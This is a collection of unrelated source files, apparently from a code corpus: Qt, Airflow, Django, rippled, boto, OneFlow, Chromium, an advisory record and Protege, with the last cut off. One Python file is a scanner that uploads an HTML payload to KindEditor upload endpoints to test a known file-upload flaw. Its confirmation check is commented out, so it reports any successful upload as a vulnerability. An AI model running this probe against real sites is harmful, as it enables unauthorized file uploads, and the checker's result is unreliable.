<filename>modules/cvv/src/qtutil/matchview/matchsettingsselector.cpp<gh_stars>1000+ #include <QVBoxLayout> #include <QPushButton> #include "matchsettingsselector.hpp" #include "../../util/util.hpp" namespace cvv{ namespace qtutil{ MatchSettingsSelector::MatchSettingsSelector(const std::vector<cv::DMatch> &univers, QWidget *parent): MatchSettings{parent}, RegisterHelper<MatchSettings,std::vector<cv::DMatch>>{}, univers_{univers} { auto layout=util::make_unique<QVBoxLayout>(); auto headerLayout=util::make_unique<QHBoxLayout>(); auto closebutton=util::make_unique<QPushButton>("-"); closebutton->setMaximumWidth(30); connect(closebutton.get(),SIGNAL(clicked()),this,SLOT(removeMe())); connect(&signalElementSelected(),SIGNAL(signal(QString)),this,SLOT(changedSetting())); headerLayout->addWidget(closebutton.release()); headerLayout->addWidget(comboBox_); layout->setContentsMargins(0, 0, 0, 0); layout->addLayout(headerLayout.release()); layout_=layout.get(); setLayout(layout.release()); if(this->has(this->selection())){ changedSetting(); } } void MatchSettingsSelector::setSettings(CVVMatch &match) { setting_->setSettings(match); } void MatchSettingsSelector::changedSetting() { auto setting=(*this)()(univers_); if(setting){ if(setting_){ layout_->removeWidget(setting_); disconnect(setting_,SIGNAL(settingsChanged(MatchSettings&)), this,SIGNAL(settingsChanged(MatchSettings&))); setting_->deleteLater(); } setting_=setting.get(); layout_->addWidget(setting.release()); connect(setting_,SIGNAL(settingsChanged(MatchSettings&)), this,SIGNAL(settingsChanged(MatchSettings&))); setting_->updateAll(); } } }}
582
8,092
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import os from datetime import datetime from airflow import models from airflow.decorators import task from airflow.providers.amazon.aws.hooks.s3 import S3Hook from airflow.providers.amazon.aws.operators.s3 import S3CreateBucketOperator, S3DeleteBucketOperator from airflow.providers.google.cloud.operators.gcs import GCSCreateBucketOperator, GCSDeleteBucketOperator from airflow.providers.google.cloud.transfers.s3_to_gcs import S3ToGCSOperator GCP_PROJECT_ID = os.environ.get('GCP_PROJECT_ID', 'gcp-project-id') S3BUCKET_NAME = os.environ.get('S3BUCKET_NAME', 'example-s3bucket-name') GCS_BUCKET = os.environ.get('GCP_GCS_BUCKET', 'example-gcsbucket-name') GCS_BUCKET_URL = f"gs://{GCS_BUCKET}/" UPLOAD_FILE = '/tmp/example-file.txt' PREFIX = 'TESTS' @task(task_id='upload_file_to_s3') def upload_file(): """A callable to upload file to AWS bucket""" s3_hook = S3Hook() s3_hook.load_file(filename=UPLOAD_FILE, key=PREFIX, bucket_name=S3BUCKET_NAME) with models.DAG( 'example_s3_to_gcs', schedule_interval='@once', start_date=datetime(2021, 1, 1), catchup=False, tags=['example'], ) as dag: create_s3_bucket = S3CreateBucketOperator( task_id="create_s3_bucket", bucket_name=S3BUCKET_NAME, region_name='us-east-1' ) create_gcs_bucket = GCSCreateBucketOperator( task_id="create_bucket", bucket_name=GCS_BUCKET, project_id=GCP_PROJECT_ID, ) # [START howto_transfer_s3togcs_operator] transfer_to_gcs = S3ToGCSOperator( task_id='s3_to_gcs_task', bucket=S3BUCKET_NAME, prefix=PREFIX, dest_gcs=GCS_BUCKET_URL ) # [END howto_transfer_s3togcs_operator] delete_s3_bucket = S3DeleteBucketOperator( task_id='delete_s3_bucket', bucket_name=S3BUCKET_NAME, force_delete=True ) delete_gcs_bucket = GCSDeleteBucketOperator(task_id='delete_gcs_bucket', bucket_name=GCS_BUCKET) ( create_s3_bucket >> upload_file() >> create_gcs_bucket >> transfer_to_gcs >> delete_s3_bucket >> delete_gcs_bucket )
1,125
974
from django.urls import path from django.views.generic import TemplateView from .formsets import AddressFormSet from .views import ( AddressFormSetView, AddressFormSetViewKwargs, AddressFormSetViewNamed, EventCalendarView, FormAndFormSetOverrideView, ItemModelFormSetExcludeView, ItemModelFormSetView, OrderCreateNamedView, OrderCreateView, OrderItemFormSetView, OrderTagsView, OrderUpdateView, PagedModelFormSetView, SearchableItemListView, SortableItemListView, ) urlpatterns = [ path("formset/simple/", AddressFormSetView.as_view()), path("formset/simple/named/", AddressFormSetViewNamed.as_view()), path("formset/simple/kwargs/", AddressFormSetViewKwargs.as_view()), path( "formset/simple_redirect/", AddressFormSetView.as_view(success_url="/formset/simple_redirect/valid/"), ), path( "formset/simple_redirect/valid/", TemplateView.as_view(template_name="extra_views/success.html"), ), path("formset/custom/", AddressFormSetView.as_view(formset_class=AddressFormSet)), path("modelformset/simple/", ItemModelFormSetView.as_view()), path("modelformset/exclude/", ItemModelFormSetExcludeView.as_view()), path("modelformset/custom/", FormAndFormSetOverrideView.as_view()), path("modelformset/paged/", PagedModelFormSetView.as_view()), path("inlineformset/<int:pk>/", OrderItemFormSetView.as_view()), path("inlines/<int:pk>/new/", OrderCreateView.as_view()), path("inlines/new/", OrderCreateView.as_view()), path("inlines/new/named/", OrderCreateNamedView.as_view()), path("inlines/<int:pk>/", OrderUpdateView.as_view()), path("genericinlineformset/<int:pk>/", OrderTagsView.as_view()), path("sortable/<str:flag>/", SortableItemListView.as_view()), path("events/<int:year>/<str:month>/", EventCalendarView.as_view()), path("searchable/", SearchableItemListView.as_view()), path( "searchable/predefined_query/", SearchableItemListView.as_view(define_query=True), ), path("searchable/exact_query/", SearchableItemListView.as_view(exact_query=True)), path("searchable/wrong_lookup/", SearchableItemListView.as_view(wrong_lookup=True)), ]
876
3,804
<reponame>sneh19337/rippled //------------------------------------------------------------------------------ /* This file is part of rippled: https://github.com/ripple/rippled Copyright (c) 2012, 2013 Ripple Labs Inc. Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL , DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ //============================================================================== #include <ripple/basics/PerfLog.h> #include <ripple/basics/contract.h> #include <ripple/core/JobQueue.h> #include <mutex> namespace ripple { JobQueue::JobQueue( beast::insight::Collector::ptr const& collector, beast::Journal journal, Logs& logs, perf::PerfLog& perfLog) : m_journal(journal) , m_lastJob(0) , m_invalidJobData(JobTypes::instance().getInvalid(), collector, logs) , m_processCount(0) , m_workers(*this, &perfLog, "JobQueue", 0) , m_cancelCallback(std::bind(&JobQueue::isStopping, this)) , perfLog_(perfLog) , m_collector(collector) { hook = m_collector->make_hook(std::bind(&JobQueue::collect, this)); job_count = m_collector->make_gauge("job_count"); { std::lock_guard lock(m_mutex); for (auto const& x : JobTypes::instance()) { JobTypeInfo const& jt = x.second; // And create dynamic information for all jobs auto const result(m_jobData.emplace( std::piecewise_construct, std::forward_as_tuple(jt.type()), std::forward_as_tuple(jt, m_collector, logs))); assert(result.second == true); (void)result.second; } } } JobQueue::~JobQueue() { // Must unhook before destroying hook = beast::insight::Hook(); } void JobQueue::collect() { std::lock_guard lock(m_mutex); job_count = m_jobSet.size(); } bool JobQueue::addRefCountedJob( JobType type, std::string const& name, JobFunction const& func) { assert(type != jtINVALID); auto iter(m_jobData.find(type)); assert(iter != m_jobData.end()); if (iter == m_jobData.end()) return false; JLOG(m_journal.debug()) << __func__ << " : Adding job : " << name << " : " << type; JobTypeData& data(iter->second); // FIXME: Workaround incorrect client shutdown ordering // do not add jobs to a queue with no threads assert(type == jtCLIENT || m_workers.getNumberOfThreads() > 0); { std::lock_guard lock(m_mutex); auto result = m_jobSet.emplace( type, name, ++m_lastJob, data.load(), func, m_cancelCallback); queueJob(*result.first, lock); } return true; } int JobQueue::getJobCount(JobType t) const { std::lock_guard lock(m_mutex); JobDataMap::const_iterator c = m_jobData.find(t); return (c == m_jobData.end()) ? 0 : c->second.waiting; } int JobQueue::getJobCountTotal(JobType t) const { std::lock_guard lock(m_mutex); JobDataMap::const_iterator c = m_jobData.find(t); return (c == m_jobData.end()) ? 0 : (c->second.waiting + c->second.running); } int JobQueue::getJobCountGE(JobType t) const { // return the number of jobs at this priority level or greater int ret = 0; std::lock_guard lock(m_mutex); for (auto const& x : m_jobData) { if (x.first >= t) ret += x.second.waiting; } return ret; } void JobQueue::setThreadCount(int c, bool const standaloneMode) { if (standaloneMode) { c = 1; } else if (c == 0) { c = static_cast<int>(std::thread::hardware_concurrency()); c = 2 + std::min(c, 4); // I/O will bottleneck JLOG(m_journal.info()) << "Auto-tuning to " << c << " validation/transaction/proposal threads."; } else { JLOG(m_journal.info()) << "Configured " << c << " validation/transaction/proposal threads."; } m_workers.setNumberOfThreads(c); } std::unique_ptr<LoadEvent> JobQueue::makeLoadEvent(JobType t, std::string const& name) { JobDataMap::iterator iter(m_jobData.find(t)); assert(iter != m_jobData.end()); if (iter == m_jobData.end()) return {}; return std::make_unique<LoadEvent>(iter->second.load(), name, true); } void JobQueue::addLoadEvents(JobType t, int count, std::chrono::milliseconds elapsed) { if (isStopped()) LogicError("JobQueue::addLoadEvents() called after JobQueue stopped"); JobDataMap::iterator iter(m_jobData.find(t)); assert(iter != m_jobData.end()); iter->second.load().addSamples(count, elapsed); } bool JobQueue::isOverloaded() { int count = 0; for (auto& x : m_jobData) { if (x.second.load().isOver()) ++count; } return count > 0; } Json::Value JobQueue::getJson(int c) { using namespace std::chrono_literals; Json::Value ret(Json::objectValue); ret["threads"] = m_workers.getNumberOfThreads(); Json::Value priorities = Json::arrayValue; std::lock_guard lock(m_mutex); for (auto& x : m_jobData) { assert(x.first != jtINVALID); if (x.first == jtGENERIC) continue; JobTypeData& data(x.second); LoadMonitor::Stats stats(data.stats()); int waiting(data.waiting); int running(data.running); if ((stats.count != 0) || (waiting != 0) || (stats.latencyPeak != 0ms) || (running != 0)) { Json::Value& pri = priorities.append(Json::objectValue); pri["job_type"] = data.name(); if (stats.isOverloaded) pri["over_target"] = true; if (waiting != 0) pri["waiting"] = waiting; if (stats.count != 0) pri["per_second"] = static_cast<int>(stats.count); if (stats.latencyPeak != 0ms) pri["peak_time"] = static_cast<int>(stats.latencyPeak.count()); if (stats.latencyAvg != 0ms) pri["avg_time"] = static_cast<int>(stats.latencyAvg.count()); if (running != 0) pri["in_progress"] = running; } } ret["job_types"] = priorities; return ret; } void JobQueue::rendezvous() { std::unique_lock<std::mutex> lock(m_mutex); cv_.wait(lock, [this] { return m_processCount == 0 && m_jobSet.empty(); }); } JobTypeData& JobQueue::getJobTypeData(JobType type) { JobDataMap::iterator c(m_jobData.find(type)); assert(c != m_jobData.end()); // NIKB: This is ugly and I hate it. We must remove jtINVALID completely // and use something sane. if (c == m_jobData.end()) return m_invalidJobData; return c->second; } void JobQueue::stop() { stopping_ = true; using namespace std::chrono_literals; jobCounter_.join("JobQueue", 1s, m_journal); { // After the JobCounter is joined, all jobs have finished executing // (i.e. returned from `Job::doJob`) and no more are being accepted, // but there may still be some threads between the return of // `Job::doJob` and the return of `JobQueue::processTask`. That is why // we must wait on the condition variable to make these assertions. std::unique_lock<std::mutex> lock(m_mutex); cv_.wait( lock, [this] { return m_processCount == 0 && m_jobSet.empty(); }); assert(m_processCount == 0); assert(m_jobSet.empty()); assert(nSuspend_ == 0); stopped_ = true; } } bool JobQueue::isStopped() const { return stopped_; } void JobQueue::queueJob(Job const& job, std::lock_guard<std::mutex> const& lock) { JobType const type(job.getType()); assert(type != jtINVALID); assert(m_jobSet.find(job) != m_jobSet.end()); perfLog_.jobQueue(type); JobTypeData& data(getJobTypeData(type)); if (data.waiting + data.running < getJobLimit(type)) { m_workers.addTask(); } else { // defer the task until we go below the limit // ++data.deferred; } ++data.waiting; } void JobQueue::getNextJob(Job& job) { assert(!m_jobSet.empty()); std::set<Job>::const_iterator iter; for (iter = m_jobSet.begin(); iter != m_jobSet.end(); ++iter) { JobTypeData& data(getJobTypeData(iter->getType())); assert(data.running <= getJobLimit(data.type())); // Run this job if we're running below the limit. if (data.running < getJobLimit(data.type())) { assert(data.waiting > 0); break; } } assert(iter != m_jobSet.end()); JobType const type = iter->getType(); JobTypeData& data(getJobTypeData(type)); assert(type != jtINVALID); job = *iter; m_jobSet.erase(iter); --data.waiting; ++data.running; } void JobQueue::finishJob(JobType type) { assert(type != jtINVALID); JobTypeData& data = getJobTypeData(type); // Queue a deferred task if possible if (data.deferred > 0) { assert(data.running + data.waiting >= getJobLimit(type)); --data.deferred; m_workers.addTask(); } --data.running; } void JobQueue::processTask(int instance) { JobType type; { using namespace std::chrono; Job::clock_type::time_point const start_time(Job::clock_type::now()); { Job job; { std::lock_guard lock(m_mutex); getNextJob(job); ++m_processCount; } type = job.getType(); JobTypeData& data(getJobTypeData(type)); JLOG(m_journal.trace()) << "Doing " << data.name() << "job"; // The amount of time that the job was in the queue auto const q_time = ceil<microseconds>(start_time - job.queue_time()); perfLog_.jobStart(type, q_time, start_time, instance); job.doJob(); // The amount of time it took to execute the job auto const x_time = ceil<microseconds>(Job::clock_type::now() - start_time); if (x_time >= 10ms || q_time >= 10ms) { getJobTypeData(type).dequeue.notify(q_time); getJobTypeData(type).execute.notify(x_time); } perfLog_.jobFinish(type, x_time, instance); } } { std::lock_guard lock(m_mutex); // Job should be destroyed before stopping // otherwise destructors with side effects can access // parent objects that are already destroyed. finishJob(type); if (--m_processCount == 0 && m_jobSet.empty()) cv_.notify_all(); } // Note that when Job::~Job is called, the last reference // to the associated LoadEvent object (in the Job) may be destroyed. } int JobQueue::getJobLimit(JobType type) { JobTypeInfo const& j(JobTypes::instance().get(type)); assert(j.type() != jtINVALID); return j.limit(); } } // namespace ripple
5,054
351
#!/usr/bin/env python3 import re from app.lib.utils.request import request from app.lib.utils.common import get_useragent class Upload_File_BaseVerify: def __init__(self, url): self.info = { 'name': 'kindeditor 文件上传漏洞', 'description': 'kindeditor 文件上传漏洞, 影响范围为: kindeditor<=4.1.5', 'date': '', 'exptype': 'check', 'type': 'File Upload' } self.url = url if not self.url.startswith("http") and not self.url.startswith("https"): self.url = "http://" + self.url self.headers = { 'User-Agent': get_useragent() } self.path = '' self.html_payload = ''' <html><head> <title>Uploader</title> <script src="%s/SEMCMS_PHP_3.9/Edit/kindeditor.js"></script> <script> KindEditor.ready(function(K) { var uploadbutton = K.uploadbutton({ button : K('#uploadButton')[0], fieldName : 'imgFile', url : '%s', afterUpload : function(data) { if (data.error === 0) { var url = K.formatUrl(data.url, 'absolute'); K('#url').val(url);} }, }); uploadbutton.fileBox.change(function(e) { uploadbutton.submit(); }); }); </script></head><body> <div class="upload"> <input class="ke-input-text" type="text" id="url" value="" readonly="readonly" /> <input type="button" id="uploadButton" value="Upload" /> </div> </body> </html> ''' %(self.url, self.path) def check_path(self): """ 检测是否存在路径 :param: :return bool True or False: 是否存在路径 """ site_type= ['/kindeditor/asp/upload_json.asp','/kindeditor/asp.net/upload_json.ashx', '/kindeditor/jsp/upload_json.jsp', '/kindeditor/php/upload_json.php','/kindeditor/examples/uploadbutton.html'] if not self.url.startswith("http") and not self.url.startswith("https"): self.url = "http://" + self.url for url in site_type: check_url = self.url + url + '?dir=file' check = request.get(check_url, headers = self.headers) if check.status_code == 200: self.path = check_url return True return False def check(self): """ 检测是否存在漏洞 :param: :return bool True or False: 是否存在漏洞 """ try: if self.check_path(): files = { 'imgFile': ('test.html', self.html_payload, 'application/octet-stream') } upload_html = request.post(self.path, headers = self.headers, files = files) if upload_html.status_code == 200: pattern = re.compile('{"error":0,"url":"(.*?)"}') #print(upload_html.text) html = pattern.findall(upload_html.text)[0].replace('\\', '').split('/') html_path = '/' + '/'.join(html[2:]) check_html = request.get(self.url + html_path, headers = self.headers) '''if check_html.status_code == 200: print("存在kindeditor上传漏洞") return True''' print("存在kindeditor上传漏洞") return True else: print("不存在kindeditor上传漏洞") return False else: print("不存在kindeditor上传漏洞") return False except Exception as e: print(e) return False finally: pass if __name__ == "__main__": UPLOAD_FILE = Upload_File_BaseVerify('http://baidu.com/') UPLOAD_FILE.check()
2,500
2,151
<reponame>stdft112/depot_tools<filename>third_party/boto/services/sonofmmm.py # Copyright (c) 2006,2007 <NAME> http://garnaat.org/ # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. import boto from boto.services.service import Service from boto.services.message import ServiceMessage import os import mimetypes class SonOfMMM(Service): def __init__(self, config_file=None): Service.__init__(self, config_file) self.log_file = '%s.log' % self.instance_id self.log_path = os.path.join(self.working_dir, self.log_file) boto.set_file_logger(self.name, self.log_path) if self.sd.has_option('ffmpeg_args'): self.command = '/usr/local/bin/ffmpeg ' + self.sd.get('ffmpeg_args') else: self.command = '/usr/local/bin/ffmpeg -y -i %s %s' self.output_mimetype = self.sd.get('output_mimetype') if self.sd.has_option('output_ext'): self.output_ext = self.sd.get('output_ext') else: self.output_ext = mimetypes.guess_extension(self.output_mimetype) self.output_bucket = self.sd.get_obj('output_bucket') self.input_bucket = self.sd.get_obj('input_bucket') # check to see if there are any messages queue # if not, create messages for all files in input_bucket m = self.input_queue.read(1) if not m: self.queue_files() def queue_files(self): boto.log.info('Queueing files from %s' % self.input_bucket.name) for key in self.input_bucket: boto.log.info('Queueing %s' % key.name) m = ServiceMessage() if self.output_bucket: d = {'OutputBucket' : self.output_bucket.name} else: d = None m.for_key(key, d) self.input_queue.write(m) def process_file(self, in_file_name, msg): base, ext = os.path.splitext(in_file_name) out_file_name = os.path.join(self.working_dir, base+self.output_ext) command = self.command % (in_file_name, out_file_name) boto.log.info('running:\n%s' % command) status = self.run(command) if status == 0: return [(out_file_name, self.output_mimetype)] else: return [] def shutdown(self): if os.path.isfile(self.log_path): if self.output_bucket: key = self.output_bucket.new_key(self.log_file) key.set_contents_from_filename(self.log_path) Service.shutdown(self)
1,492
3,285
""" Copyright 2020 The OneFlow Authors. All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import threading def Await(counter, func): assert counter > 0 cond_var = threading.Condition() counter_box = [counter] result_list = [] def Yield(result=None): result_list.append(result) cond_var.acquire() assert counter_box[0] > 0 counter_box[0] -= 1 cond_var.notify() cond_var.release() func(Yield) cond_var.acquire() while counter_box[0] > 0: cond_var.wait() cond_var.release() return result_list
375
14,668
// Copyright 2021 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CHROME_BROWSER_ENTERPRISE_CONNECTORS_DEVICE_TRUST_KEY_MANAGEMENT_BROWSER_COMMANDS_WIN_KEY_ROTATION_COMMAND_H_ #define CHROME_BROWSER_ENTERPRISE_CONNECTORS_DEVICE_TRUST_KEY_MANAGEMENT_BROWSER_COMMANDS_WIN_KEY_ROTATION_COMMAND_H_ #include "base/callback.h" #include "base/memory/scoped_refptr.h" #include "base/win/windows_types.h" #include "chrome/browser/enterprise/connectors/device_trust/key_management/browser/commands/key_rotation_command.h" namespace base { class SingleThreadTaskRunner; } namespace enterprise_connectors { class WinKeyRotationCommand : public KeyRotationCommand { public: // Error returned by Omaha when concurrent elevated commands are run. // Making this public to be used in tests. static const HRESULT GOOPDATE_E_APP_USING_EXTERNAL_UPDATER = 0xA043081D; using RunGoogleUpdateElevatedCommandFn = HRESULT (*)(const wchar_t* command, const std::vector<std::string>& args, DWORD* return_code); // The second constructor is used in tests to override the behaviour of // Google Update. WinKeyRotationCommand(); explicit WinKeyRotationCommand( RunGoogleUpdateElevatedCommandFn run_elevated_command); ~WinKeyRotationCommand() override; // KeyRotationCommand: void Trigger(const Params& params, Callback callback) override; // Enable or disable wait/sleep in tests to keep them from taking too long. void enable_waiting_for_testing(bool enabled) { waiting_enabled_ = enabled; } private: scoped_refptr<base::SingleThreadTaskRunner> com_thread_runner_; bool waiting_enabled_ = true; RunGoogleUpdateElevatedCommandFn run_elevated_command_ = nullptr; }; } // namespace enterprise_connectors #endif // CHROME_BROWSER_ENTERPRISE_CONNECTORS_DEVICE_TRUST_KEY_MANAGEMENT_BROWSER_COMMANDS_WIN_KEY_ROTATION_COMMAND_H_
683
892
<filename>advisories/unreviewed/2022/04/GHSA-cxx4-wmc3-37mh/GHSA-cxx4-wmc3-37mh.json { "schema_version": "1.2.0", "id": "GHSA-cxx4-wmc3-37mh", "modified": "2022-04-29T02:59:37Z", "published": "2022-04-29T02:59:37Z", "aliases": [ "CVE-2004-1459" ], "details": "Cisco Secure Access Control Server (ACS) 3.2, when configured as a Light Extensible Authentication Protocol (LEAP) RADIUS proxy, allows remote attackers to cause a denial of service (device crash) via certain LEAP authentication requests.", "severity": [ ], "affected": [ ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2004-1459" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17116" }, { "type": "WEB", "url": "http://www.cisco.com/warp/public/707/cisco-sa-20040825-acs.shtml" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/11047" } ], "database_specific": { "cwe_ids": [ ], "severity": "MODERATE", "github_reviewed": false } }
506
652
// // WLTableViewViewController.h // WLBaseView_Example // // Created by 刘光强 on 2018/3/15. // Copyright © 2018年 guangqiang-liu. All rights reserved. // #import "WLBaseViewController.h" @interface WLBaseTableViewViewController : WLBaseViewController @end
98
746
<gh_stars>100-1000 package org.protege.editor.owl.ui.view.individual; import org.protege.editor.core.ui.RefreshableComponent; import org.protege.editor.core.ui.view.DisposableAction; import org.protege.editor.owl.model.entity.OWLEntityCreationSet; import org.protege.editor.owl.model.event.EventType; import org.protege.editor.owl.model.event.OWLModelManagerListener; import org.protege.editor.owl.model.selection.SelectionDriver; import org.protege.editor.owl.model.util.OWLEntityDeleter; import org.protege.editor.owl.ui.action.DeleteIndividualAction; import org.protege.editor.owl.ui.list.OWLObjectList; import org.protege.editor.owl.ui.renderer.AddEntityIcon; import org.protege.editor.owl.ui.renderer.OWLIndividualIcon; import org.protege.editor.owl.ui.view.ChangeListenerMediator; import org.protege.editor.owl.ui.view.CreateNewTarget; import org.protege.editor.owl.ui.view.Deleteable; import org.protege.editor.owl.ui.view.Findable; import org.semanticweb.owlapi.model.*; import org.semanticweb.owlapi.util.OWLEntityCollector; import javax.swing.*; import javax.swing.event.ChangeListener; import javax.swing.event.ListSelectionEvent; import javax.swing.event.ListSelectionListener; import java.awt.*; import java.awt.event.ActionEvent; import java.awt.event.MouseAdapter; import java.awt.event.MouseEvent; import java.util.*; import java.util.List; /** * Author: <NAME><br> * The University Of Manchester<br> * Bio-Health Informatics Group<br> * Date: 29-Jan-2007<br> * <br> This definitely needs a rethink - it is a totally inefficient hack! */ public class OWLIndividualListViewComponent extends AbstractOWLIndividualViewComponent implements Findable<OWLNamedIndividual>, Deleteable, CreateNewTarget, RefreshableComponent, SelectionDriver { private OWLObjectList<OWLNamedIndividual> list; private OWLOntologyChangeListener listener; private ChangeListenerMediator changeListenerMediator; private OWLModelManagerListener modelManagerListener; private boolean selectionChangedByUser = true; protected Set<OWLNamedIndividual> individualsInList; private ListSelectionListener listSelectionListener = new ListSelectionListener() { public void valueChanged(ListSelectionEvent e) { if (!e.getValueIsAdjusting()) { if (list.getSelectedValue() != null && selectionChangedByUser) { setGlobalSelection(list.getSelectedValue()); } changeListenerMediator.fireStateChanged(OWLIndividualListViewComponent.this); } } }; public void initialiseIndividualsView() throws Exception { list = new OWLObjectList<>(getOWLEditorKit()); int selectionMode = ListSelectionModel.MULTIPLE_INTERVAL_SELECTION; list.setSelectionMode(selectionMode); setLayout(new BorderLayout()); add(new JScrollPane(list)); list.addListSelectionListener(listSelectionListener); list.addMouseListener(new MouseAdapter() { public void mouseReleased(MouseEvent e) { setGlobalSelection(list.getSelectedValue()); } }); listener = changes -> processChanges(changes); getOWLModelManager().addOntologyChangeListener(listener); setupActions(); changeListenerMediator = new ChangeListenerMediator(); individualsInList = new TreeSet<>(getOWLModelManager().getOWLObjectComparator()); refill(); modelManagerListener = event -> { if (event.isType(EventType.ACTIVE_ONTOLOGY_CHANGED) || event.isType(EventType.ONTOLOGY_RELOADED)) { refill(); } }; getOWLModelManager().addListener(modelManagerListener); } protected void setupActions() { addAction(new AddIndividualAction(), "A", "A"); addAction(new DeleteIndividualAction(getOWLEditorKit(), () -> getSelectedIndividuals()), "B", "A"); } public void refreshComponent() { refill(); } protected void refill() { // Initial fill individualsInList.clear(); for (OWLOntology ont : getOntologies()) { individualsInList.addAll(ont.getIndividualsInSignature()); } reset(); } protected Set<OWLOntology> getOntologies() { return getOWLModelManager().getActiveOntologies(); } public void setSelectedIndividual(OWLIndividual individual) { list.setSelectedValue(individual, true); } protected void reset() { OWLNamedIndividual[] objects = individualsInList.toArray(new OWLNamedIndividual[individualsInList.size()]); list.setListData(objects); OWLNamedIndividual individual = getSelectedOWLIndividual(); selectionChangedByUser = false; try { list.setSelectedValue(individual, true); } finally { selectionChangedByUser = true; } } public OWLNamedIndividual updateView(OWLNamedIndividual selelectedIndividual) { if (!isPinned()) { list.setSelectedValue(selelectedIndividual, true); } return list.getSelectedValue(); } public void disposeView() { getOWLModelManager().removeOntologyChangeListener(listener); getOWLModelManager().removeListener(modelManagerListener); } public OWLNamedIndividual getSelectedIndividual() { return list.getSelectedValue(); } public Set<OWLNamedIndividual> getSelectedIndividuals() { return new LinkedHashSet<>(list.getSelectedValuesList()); } protected void processChanges(List<? extends OWLOntologyChange> changes) { Set<OWLEntity> possiblyAddedObjects = new HashSet<>(); Set<OWLEntity> possiblyRemovedObjects = new HashSet<>(); OWLEntityCollector addedCollector = new OWLEntityCollector(possiblyAddedObjects); OWLEntityCollector removedCollector = new OWLEntityCollector(possiblyRemovedObjects); for (OWLOntologyChange chg : changes) { if (chg.isAxiomChange()) { OWLAxiomChange axChg = (OWLAxiomChange) chg; if (axChg instanceof AddAxiom) { axChg.getAxiom().accept(addedCollector); } else { axChg.getAxiom().accept(removedCollector); } } } boolean mod = false; for (OWLEntity ent : possiblyAddedObjects) { if (ent instanceof OWLIndividual) { if (individualsInList.add((OWLNamedIndividual) ent)) { mod = true; } } } for (OWLEntity ent : possiblyRemovedObjects) { if (ent instanceof OWLIndividual) { boolean stillReferenced = false; for (OWLOntology ont : getOntologies()) { if (ont.containsIndividualInSignature(ent.getIRI())) { stillReferenced = true; break; } } if (!stillReferenced) { if (individualsInList.remove(ent)) { mod = true; } } } } if (mod) { reset(); } } protected void addIndividual() { OWLEntityCreationSet<OWLNamedIndividual> set = getOWLWorkspace().createOWLIndividual(); if (set == null) { return; } List<OWLOntologyChange> changes = new ArrayList<>(); changes.addAll(set.getOntologyChanges()); changes.addAll(dofurtherCreateSteps(set.getOWLEntity())); getOWLModelManager().applyChanges(changes); OWLNamedIndividual ind = set.getOWLEntity(); if (ind != null) { list.setSelectedValue(ind, true); } } protected List<OWLOntologyChange> dofurtherCreateSteps(OWLIndividual newIndividual) { return Collections.emptyList(); } public List<OWLNamedIndividual> find(String match) { return new ArrayList<>(getOWLModelManager().getOWLEntityFinder().getMatchingOWLIndividuals(match)); } public void show(OWLNamedIndividual owlEntity) { list.setSelectedValue(owlEntity, true); } public void setSelectedIndividuals(Set<OWLNamedIndividual> individuals) { list.setSelectedValues(individuals, true); } private class AddIndividualAction extends DisposableAction { public AddIndividualAction() { super("Add individual", new AddEntityIcon(new OWLIndividualIcon())); } public void actionPerformed(ActionEvent e) { addIndividual(); } public void dispose() { } } public void addChangeListener(ChangeListener listener) { changeListenerMediator.addChangeListener(listener); } public void removeChangeListener(ChangeListener listener) { changeListenerMediator.removeChangeListener(listener); } public void handleDelete() { OWLEntityDeleter.deleteEntities(getSelectedIndividuals(), getOWLModelManager()); } public boolean canDelete() { return !getSelectedIndividuals().isEmpty(); } public boolean canCreateNew() { return true; } public void createNewObject() { addIndividual(); } public void setSelectionMode(int selectionMode) { if (list != null) { list.setSelectionMode(selectionMode); } } public void setIndividualListColor(Color c) { list.setBackground(c); } @Override public Component asComponent() { return this; } @Override public 